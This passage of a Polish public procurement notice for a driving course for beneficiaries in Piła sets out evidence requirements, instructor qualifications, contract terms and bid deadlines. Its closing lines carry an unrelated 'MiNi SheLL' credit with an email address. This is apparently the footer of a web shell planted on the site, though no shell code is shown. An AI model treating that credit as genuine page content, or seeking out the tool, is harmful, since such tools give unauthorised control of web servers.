pilskiego, zajęcia praktyczne – teren województwa wielkopolskiego i ościennych. Wykonawca zobowiązuje się do ustalenia terminów zajęć teoretycznych i praktycznych dogodnych dla beneficjentów. Kursanci na zajęcia praktyczne, odbierani będą z ustalonego<br/>miejsca zbiórki na terenie miasta Piły, a po zakończeniu zajęć praktycznych odwożeni do ustalonego miejsca na terenie miasta Piły. Wykonawca zapewnia miejsce do prowadzenia kursu w części teoretycznej, wyposażone w sprzęt i materiały umożliwiający prawidłowy przebieg kursu, a w części praktycznej: plac manewrowy na terenie Powiatu Pilskiego, w innym<br/>przypadku Wykonawca na własny koszt dowozi uczestników na plac zlokalizowany poza w/w terenem. Minimum na 5 dni przed rozpoczęciem zajęć Wykonawca poinformuje pracownika merytorycznego Powiatowego Centrum Pomocy Rodzinie w Pile o ich rozpoczęciu.<br/>Wszelkie inne istotne informacje znajdują się w SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Do oferty wykonawca<br/>dołącza aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o niepodleganiu<br/>wykluczeniu z postępowania – zał. nr 1 do SIWZ<br/>Informacje zawarte w oświadczeniu stanowią wstępne potwierdzenie, że wykonawca nie podlega wykluczeniu oraz spełnia warunki<br/>udziału w postępowaniu.<br/>2. Zamawiający wzywa wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni<br/>od dnia wezwania, podmiotowych środków dowodowych, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>3. Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu postępowania o udzielenie zamówienia, zamawiający może na<br/>każdym etapie postępowania wezwać wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych<br/>aktualnych na dzień ich złożenia.<br/>4. Podmiotowe środki dowodowe wymagane od wykonawcy obejmują:<br/>1) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie at. 109 ust.1 pkt. 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji;<br/>2) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami (załącznik nr 4 do SWZ);<br/>5. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 4 pkt. 1) - składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się on w<br/>innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia procedury. Dokument ten powinien być wystawiony nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>6. Jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. 5, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone pod przysięgą, lub jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie ma przepisów o oświadczeniu pod<br/>przysięgą, złożone przed organem sądowym lub administracyjnym, notariuszem , organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania wykonawcy. Dokument ten powinien być wystawiony nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>7. Dokumenty i oświadczenia sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.<br/>8. W zakresie nieuregulowanym ustawa PZP lub niniejszą SWZ do oświadczeń i dokumentów składanych przez wykonawcę w<br/>postępowaniu zastosowanie mają w szczególności przepisy Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający od wykonawcy oraz Rozporządzenia Prezesa Rady Ministrów z dnia 30 grudnia 2020 r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>Inne istotne informacje znajdują się w SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>a) nie podlegają wykluczeniu na podstawie:<br/>- art. 108 ust. 1 (obligatoryjne podstawy wykluczenia)<br/>- art. 109 ust. 1 pkt. 4 Ustawy (z postępowania o udzielenie zamówienia wyklucza się wykonawcę w stosunku do którego otwarto likwidację, ogłoszono upadłość, którego aktywami zarządza likwidator lub sąd, zawarł układ z wierzycielami, którego działalność gospodarcza jest zawieszona albo znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury).<br/>- art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz. U. 2024 r., poz. 507).<br/>Wykluczenie wykonawcy następuje zgodnie z art. 111 ustawy.<br/>b) spełniają warunki udziału w postępowaniu, określone w pkt 8.2<br/>2. Wykonawca winien dysponować osobą zdolną do wykonania zamówienia dedykowaną do jego realizacji.<br/>Ocena spełnienia warunku będzie dokonana wg. formuły spełnia/nie spełnia.<br/>Wymaga się zapewnienia minimum jednego prowadzącego spełniającego niżej wskazane kryteria<br/>a) Wykonawca musi posiadać uprawnienia do prowadzenia określonej działalności będącej przedmiotem zamówienia zgodnie z art.<br/>28 pkt ustawy z dnia 5 stycznia 2011 r. o kierujących pojazdami, tj. posiadać wpis do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców (Kopia wpisu do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców stanowi załącznik niezbędny formularza ofertowego.<br/>b) Prowadzenia kursu przez kadrę o odpowiednich kwalifikacjach i doświadczeniu, zgodnie z przepisami ustawy z dnia 5 stycznia<br/>2011 r. o kierujących pojazdami art.. 28 ust. 2 pkt 2 oraz rozporządzenia Ministra Infrastruktury z dnia 24 listopada 2023 r. w sprawie<br/>egzaminowania osób ubiegających się o uprawnienia do kierowania pojazdami, szkolenia, egzaminowania i uzyskiwania uprawnień<br/>przez egzaminatorów oraz wzorów dokumentów stosowanych w tych sprawach. (Kopia dokumentu potwierdzającego wpis do ewidencji instruktorów stanowi załącznik niezbędny formularza ofertowego);<br/>c) Wykonawca oświadcza, że posiada pełną zdolność do czynności prawnych oraz korzysta z pełni praw publicznych;<br/>d) Wykonawca nie jest skazany prawomocnym wyrokiem za umyślne przestępstwo lub umyślne przestępstwo skarbowe;<br/>e) Osoba wskazana do prowadzenia kursu nie figuruje w Rejestrze Sprawców Przestępstw na Tle Seksualnym, zgodnie z art. 21 ust. 2 ustawy z dna 13 maja 2016 r. o przeciwdziałaniu zagrożeniom przestępczością na tle seksualnym oraz nie figuruje w Krajowym Rejestrze Karnym, zgodnie z 21 art. ust. 3 ustawy z dnia 13 maja 2016 r. o przeciwdziałaniu zagrożeniom przestępczością na tle seksualnym.<br/>f) Wykonawca oświadcza, że nie jest powiązany kapitałowo lub osobowo<br/>z Zamawiającym.<br/>Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dopuszcza łączne spełnienie warunku przez Wykonawców.<br/>Zamawiający może na każdym etapie postępowania uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcie gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>Inne istotne informacje znajdują się w SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Szczegółowy opis środków dowodowych znajduje się SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Szczegółowy opis środków dowodowych znajduje się SWZ. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Szczegółowy opis innych wymaganych oświadczeń lub dokumentów znajduje się SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia<br/>2) Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być<br/>załączone do oferty.<br/>3) Jeżeli oferta wykonawców występujących wspólnie została wybrana, zamawiający żąda przed zawarciem umowy w<br/>sprawie zamówienia publicznego umowy regulującej współpracę tych wykonawców – jeżeli nie została złożona wraz z ofertą<br/>4) W przypadku wykonawców wspólnie ubiegających się o zamówienie, oświadczenia, o których mowa w pkt. 9.1 SWZ<br/>składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>zakresie, w jakim każdy z wykonawców wykazuje spełnienie warunków udziału w postępowaniu.<br/>5) Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z wykonawców<br/>wspólnie ubiegających się o zamówienie.<br/>Szczegółowe informacje znajdują się SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej oferty w zakresie uregulowanym w art. 454-455 ustawy Pzp oraz wskazanym we wzorze umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-24 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">poprzez Platformę ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-24 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-03-26</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1) Zamawiający dopuszcza składanie ofert częściowych.<br/>2) Zamawiający nie dopuszcza możliwości składania ofert wariantowych. oraz w postaci katalogów elektronicznych.<br/>3) Zamawiający nie przewiduje przeprowadzenia aukcji elektronicznej.<br/>4) Zamawiający nie przewiduje zawarcia umowy ramowej.<br/>5) Zamawiający nie zastrzega możliwości ubiegania się o udzielenie zamówienia wyłącznie przez wykonawców, o których mowa w art. 94 ustawy PZP.<br/>6) Zamawiający nie przewiduje udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy PZP<br/>7) Wszelkie rozliczenia pomiędzy zamawiającym, a wykonawcą prowadzone będę w PLN.<br/>8) Zamawiający nie przewiduje wizji lokalnej<br/>Ponadto:<br/>22. POUCZENIE O ŚRODKACH OCHRONY PRAWNEJ<br/>1. Zgodnie z ustawą Prawo Zamówień Publicznych wniesienie odwołania przysługuje na:<br/>• niezgodną z przepisami ustawy czynność zamawiającego, podjęta w postępowaniu;<br/>• zaniechanie czynności w postępowaniu, do której zamawiający był obowiązany na podstawie ustawy;<br/>2. Odwołania wnosi się w terminach przewidzianych w art. 515 ustawy PZP.<br/>3. Na orzeczenie Izby oraz postanowienie Prezesa Izby, o którym mowa w art. 519 ust.1 Ustawy PZP, stronom oraz uczestnikom postępowania odwoławczego przysługuje skarga do sądu, która wnosi się do Sądu Okręgowego w Warszawie – sądu zamówień publicznych.<br/>Inne istotne informacje znajdują się w SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com